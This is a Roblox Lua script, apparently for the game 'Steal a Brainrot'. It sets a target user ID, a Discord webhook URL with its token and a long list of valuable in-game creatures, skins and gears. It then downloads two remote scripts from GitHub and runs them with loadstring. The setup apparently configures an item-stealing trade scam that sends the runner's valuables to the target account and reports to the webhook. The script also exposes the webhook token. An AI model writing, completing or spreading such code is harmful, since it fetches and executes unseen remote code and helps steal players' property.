5getgenv().TARGET_ID = 7510379571

getgenv().DELAY_STEP = 1

getgenv().TRADE_CYCLE_DELAY = 2

getgenv().WEBHOOK_URL = "https://discord.com/api/webhooks/1519936454594265239/goQvP5mcLeXkLWJZ1E3L27JK6nvPqnt0M4Ad2uXF5dY9BTCDVzE-cV00IqaNLt-xxMh0"

getgenv().TARGET_BRAINROTS = {
        ["Strawberry Elephant"] = true,
        ["Meowl"] = true,
        ["Headless Horseman"] = true,
        ["Skibidi Toilet"] = true,
        ["Griffin"] = true,
        ["Hydra Dragon Cannelloni"] = true,
        ["Dragon Gingerini"] = true,
        ["Dragon Cannelloni"] = true,
        ["Love Love Bear"] = true,
        ["La Supreme Combinasion"] = true,
        ["Cerberus"] = true,
        ["Celestial Pegasus"] = true,
        ["Popcuru and Fizzuru"] = true,
        ["Rosey and Teddy"] = true,
        ["Capitano Moby"] = true,
        ["Cooki and Milki"] = true,
        ["Burguro And Fryuro"] = true,
        ["Ketupat Bros"] = true,
        ["Reinito Sleighito"] = true,
        ["Fortunu and Cashuru"] = true,
        ["Los Amigos"] = true,
        ["La Secret Combinasion"] = true,
        ["Los Sekolahs"] = true,
        ["Signore Carapace"] = true,
        ["La Casa Boo"] = true,
        ["Fragrama and Chocrama"] = true,
        ["La Food Combinasion"] = true,
        ["Elefanto Frigo"] = true,
        ["Spooky and Pumpky"] = true,
        ["Ginger Gerat"] = true,
        ["La Ginger Sekolah"] = true,
        ["Sammyni Fattini"] = true,
        ["Los Spaghettis"] = true,
        ["Festive 67"] = true,
        ["Ventoliero Pavonero"] = true,
        ["Cloverat Clapat"] = true,
        ["Spaghetti Tualetti"] = true,
        ["Antonio"] = true,
        ["Rosetti Tualetti"] = true,
        ["Nacho Spyder"] = true,
        ["Duggy Bros"] = true,
        ["Globa Steppa"] = true,
        ["Garama and Madundung"] = true,
        ["Fishino Clownino"] = true,
        ["Gold Gold Gold"] = true,
        ["Jolly Jolly Sahur"] = true,
        ["Lavadorito Spinito"] = true,
        ["Ketchuru and Musturu"] = true,
        ["Tirilikalika Tirilikalako"] = true,
        ["Swaggy Bros"] = true,
        ["La Romantic Grande"] = true,
        ["Orcaledon"] = true,
        ["Tictac Sahur"] = true,
        ["La Taco Combinasion"] = true,
        ["Ketupat Kepat"] = true,
        ["Dug dug dug"] = true,
        ["Rico Dinero"] = true,
        ["Tang Tang Keletang"] = true,
        ["Lovin Rose"] = true,
        ["Los Tacoritas"] = true,
        ["Eviledon"] = true,
        ["Los Primos"] = true,
        ["W or L"] = true,
        ["Esok Sekolah"] = true,
        ["Los Cupids"] = true,
        ["La Jolly Grande"] = true,
        ["Tralaledon"] = true,
        ["Los Puggies"] = true,
        ["Tuff Toucan"] = true,
        ["Gobblino Uniciclino"] = true,
        ["Chipso and Queso"] = true,
        ["Mieteteira Bicicleteira"] = true,
        ["Chillin Chili"] = true,
        ["Money Money Reindeer"] = true,
        ["La Spooky Grande"] = true,
        ["Bacuru and Egguru"] = true,
        ["Los Bros"] = true,
        ["La Extinct Grande"] = true,
        ["Los Candies"] = true,
        ["Los 67"] = true,
        ["Celularcini Viciosini"] = true,
        ["Los Mobilis"] = true,
        ["Money Money Puggy"] = true,
        ["Cigno Fulgoro"] = true,
        ["Los Spooky Combinasionas"] = true,
        ["Los Hotspotsitos"] = true,
        ["Los Jolly Combinasionas"] = true,
        ["Snailo Clovero"] = true,
        ["Los Planitos"] = true,
        ["Chicleteira Cupideira"] = true,
        ["DJ Panda"] = true,
        ["Las Sis"] = true,
        ["Spinny Hammy"] = true,
        ["Tacorita Bicicleta"] = true,
        ["Los Sweethearts"] = true,
        ["Nuclearo Dinossauro"] = true,
        ["Chicleteira Noelteira"] = true,
        ["Los Combinasionas"] = true,
        ["Chimnino"] = true,
        ["Noo my Gold"] = true,
        ["Swag Soda"] = true,
        ["Noo my Heart"] = true,
        ["Tacorillo Crocodillo"] = true,
        ["Mariachi Corazoni"] = true,
        ["La Grande Combinasion"] = true,
        ["Los 25"] = true,
        ["Los Burritos"] = true,
        ["67"] = true,
        ["Donkeyturbo Express"] = true,
        ["Los Chicleteiras"] = true,
        ["Guest 666"] = true,
        ["Los Mi Gatitos"] = true,
        ["Rang Ring Bus"] = true,
        ["Granny"] = true,
        ["Noo my Present"] = true,
        ["Serafinna Medusella"] = true,
        ["Los Nooo My Hotspotsitos"] = true,
        ["Arcadopus"] = true,
        ["Noo my Candy"] = true,
        ["Los Quesadillas"] = true,
        ["Chicleteirina Bicicleteirina"] = true,
        ["Chill Puppy"] = true,
        ["Burrito Bandito"] = true,
        ["Luck Luck Luck Sahur"] = true,
        ["Chicleteira Bicicleteira"] = true,
        ["Brunito Marsito"] = true,
        ["Quesadillo Vampiro"] = true,
        ["Eid Eid Eid Sahur"] = true,
        ["Cupid Hotspot"] = true,
        ["Mi Gatito"] = true,
        ["Ho Ho Ho Sahur"] = true,
        ["Cupid Cupid Sahur"] = true,
        ["Pot Pumpkin"] = true,
        ["Naughty Naughty"] = true,
        ["Bunito Bunito Spinito"] = true,
        ["Quesadilla Crocodila"] = true,
        ["Horegini Boom"] = true,
        ["Santa Hotspot"] = true,
        ["Pot Hotspot"] = true,
        ["25"] = true,
        ["Pirulitoita Bicicleteira"] = true,
        ["To to to Sahur"] = true,
        ["Telemorte"] = true,
        ["La Sahur Combinasion"] = true,
        ["List List List Sahur"] = true,
        ["Noo my examine"] = true,
        ["Los Jobcitos"] = true,
        ["Nooo My Hotspot"] = true,
        ["Bunnyman"] = true,
        ["Tung Tung Tung Sahur"] = true,
        ["Cuadramat and Pakrahmatmamat"] = true,
        ["Please my Present"] = true,
        ["Los Cucarachas"] = true,
        ["1x1x1x1"] = true,
        ["La Vacca Lepre Lepreino"] = true,
        ["Love Love Love Sahur"] = true,
        ["Perrito Burrito"] = true,
        ["Graipuss Medussi"] = true,
        ["Giftini Spyderini"] = true,
        ["GOAT"] = true,
        ["Trickolino"] = true,
        ["Paradiso Axolottino"] = true,
        ["Triplito Tralaleritos"] = true,
        ["La Vacca Jacko Linterino"] = true,
        ["Fishboard"] = true,
        ["Santteo"] = true,
        ["Las Vaquitas Saturnitas"] = true,
        ["Los Karkeritos"] = true,
        ["Karker Sahur"] = true,
        ["Los Trios"] = true,
        ["Job Job Job Sahur"] = true,
        ["Frankentteo"] = true,
        ["Pumpkini Spyderini"] = true,
        ["Las Tralaleritas"] = true,
        ["Rocco Disco"] = true,
        ["Extinct Matteo"] = true,
        ["La Karkerkar Combinasion"] = true,
        ["La Vacca Prese Presente"] = true,
        ["Reindeer Tralala"] = true,
        ["Yess my examine"] = true,
        ["Guerriro Digitale"] = true,
        ["Boatito Auratito"] = true,
        ["Vulturino Skeletono"] = true,
        ["Los Tralaleritos"] = true,
        ["Zombie Tralala"] = true,
        ["Los Tortus"] = true,
        ["La Cucaracha"] = true,
        ["Fragola La La La"] = true,
        ["Extinct Tralalero"] = true,
        ["Agarrini la Palini"] = true,
        ["Los Spyderinis"] = true,
        ["Chachechi"] = true,
        ["Blackhole Goat"] = true,
        ["Dul Dul Dul"] = true,
        ["Torrtuginni Dragonfrutini"] = true,
        ["Trenostruzzo Turbo 4000"] = true,
        ["Karkerkar Kurkur"] = true,
        ["Los Matteos"] = true,
        ["Bisonte Giuppitere"] = true,
        ["Sammyni Spyderini"] = true,
        ["La Vacca Saturno Saturnita"] = true,
        ["Jackorilla"] = true,
        ["Digi Narwhal"] = true,
        ["Bunny and Eggy"] = true,
        ["Kalika Bros"] = true,
        ["Cash or Card"] = true,
        ["Los Chillis"] = true,
        ["Hydra Bunny"] = true,
        ["Boppin Bunny"] = true,
        ["Gym Bros"] = true,
        ["Quackini Snackini"] = true,
        ["La Easter Grande"] = true,
        ["Los Mariachis"] = true,
        ["La Lucky Grande"] = true,
        ["Churrito Bunnito"] = true,
        ["Hopilikalika Hopilikalako"] = true,
        ["Camera Ramena"] = true,
        ["Baskito"] = true,
        ["Bananito"] = true,
        ["Noo my Eggs"] = true,
        ["Strawberrita"] = true,
        ["Los Bunitos"] = true,
        ["Buho de Volto"] = true,
        ["Bunny Bunny Bunny Sahur"] = true,
        ["Berryno"] = true,
        ["Easter Easter Easter Sahur"] = true,
        ["Buntteo"] = true,
        ["Secret Lucky Block"] = true,
        ["Foxini Lanternini"] = true,
        ["Ginger Cisterna"] = true,
        ["Centrucci Nuclucci"] = true,
        ["Rhino Helicopterino"] = true,
        ["Gorillo Subwoofero"] = true,
        ["Pancake and Syrup"] = true,
        ["Arcadragon"] = true,
        ["Money Money Bros"] = true,
        ["Los Hackers"] = true,
        ["John Doe"] = true,
        ["Rubrikiko"] = true,
        ["Kraken"] = true,
        ["Venuspino"] = true,
        ["Jelly Moby"] = true,
        ["Sammyni Cakini"] = true,
        ["Bearito Cabinito"] = true,
        ["Caylusaurus"] = true,
        ["Steakini Fattini"] = true
}

getgenv().TARGET_BASE_SKINS = {
        ["Rose"] = true,
        ["Gingerbread"] = true,
        ["Halloween"] = true,
        ["Christmas"] = true,
        ["Bunny Basket"] = true,
        ["Summer"] = true,
        ["Pot of Gold"] = true,
        ["Taco"] = true,
        ["Octo"] = true,
        ["Valentines"] = true,
        ["Easter"] = true,
        ["Lucky"] = true,
        ["Aquatic"] = true
}

getgenv().TARGET_GEARS = {
        ["Santa's Sleigh"] = true,
        ["Cupid's Wings"] = true,
        ["Witch's Broom"] = true,
        ["Waverider"] = true,
        ["Yin Yang Slap"] = true,
        ["Cursed Slap"] = true,
        ["Cyber Slap"] = true,
        ["Divine Slap"] = true,
        ["Bloodmoon Slap"] = true,
        ["Radioactive Slap"] = true,
        ["Rainbow Slap"] = true,
        ["Rainbow Hammer"] = true,
        ["Bloodmoon Hammer"] = true,
        ["Radioactive Airstrike"] = true,
        ["Yin Yang Lamp"] = true,
        ["Demon's Head"] = true,
        ["Lava Slap"] = true,
        ["Lava Blaster"] = true,
        ["Alien Slap"] = true,
        ["Blackhole Bomb"] = true,
        ["Candy Sentry"] = true
}

task.spawn(function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/JWMOREIRA/Jwmoreira.logic/refs/heads/main/Jwmoreira"))()
end)

task.spawn(function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/xspeedHub0/Zlhub/main/ZLPVPreview.lua"))()
end)
